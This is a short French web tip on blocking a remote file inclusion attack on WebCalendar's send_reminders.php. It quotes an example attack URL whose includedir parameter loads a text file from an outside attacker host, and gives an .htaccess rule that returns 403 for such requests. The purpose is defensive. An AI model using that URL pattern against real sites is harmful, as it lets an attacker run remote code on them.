HTACCESS

Eviter les attaques par le script send_reminders.php

Votre site est peut-être vulnérable si vous avez WebCalendar.

En effet vous risquez d'être victime d'une attaque par inclusion de code externe (remote file include vulnerability).

Les url à l'origine de ces hacks sont de la forme : http://www.example.om/tools/send_reminders.php?includedir=http://www.sitepourri.com/fichier.txt?

Une petite règle dans le fichier .htaccess vous protégera des hackers en retournant une code 403 (accès interdit) à chaque tentative d'accès.

RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*&)?includedir=http://
RewriteRule ^(.*/)?tools/send_reminders.php - [F,L]
PHP